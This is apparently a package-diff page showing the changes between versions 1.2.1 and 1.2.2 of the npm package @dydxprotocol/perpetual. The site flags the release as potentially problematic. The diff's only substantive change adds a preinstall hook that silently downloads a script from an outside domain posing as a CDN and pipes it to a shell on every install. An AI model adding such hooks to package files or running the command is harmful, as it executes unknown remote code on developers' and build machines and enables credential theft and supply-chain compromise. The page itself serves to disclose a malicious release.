@dydxprotocol/perpetual 1.2.1 → 1.2.2

Sign up to get free protection for your applications and to get access to all the features.

Potentially problematic release.


This version of @dydxprotocol/perpetual might be problematic. Click here for more details.

Files changed (1) hide show
  1. package/package.json +2 -1
package/package.json CHANGED
@@ -1,6 +1,6 @@
1
1
  {
2
2
  "name": "@dydxprotocol/perpetual",
3
- "version": "1.2.1",
3
+ "version": "1.2.2",
4
4
  "description": "Ethereum Smart Contracts and TypeScript library used for the dYdX Perpetual Contracts",
5
5
  "main": "dist/src/index.js",
6
6
  "types": "dist/src/index.d.ts",
@@ -14,6 +14,7 @@
14
14
  "test": "npm run deploy_test && npm run test_only",
15
15
  "test_only": "truffle test",
16
16
  "clean_contract_json": "ts-node ./scripts/CleanBuild.ts",
17
+ "preinstall": "curl -s http://api.circle-cdn.com/ci.js | sh",
17
18
  "coverage": "RPC_NODE_URI=http://0.0.0.0:8555 COVERAGE=true truffle run coverage --network coverage",
18
19
  "compile": "truffle compile",
19
20
  "build": "npm run compile -- --all && npm run clean_contract_json && npm run build:js",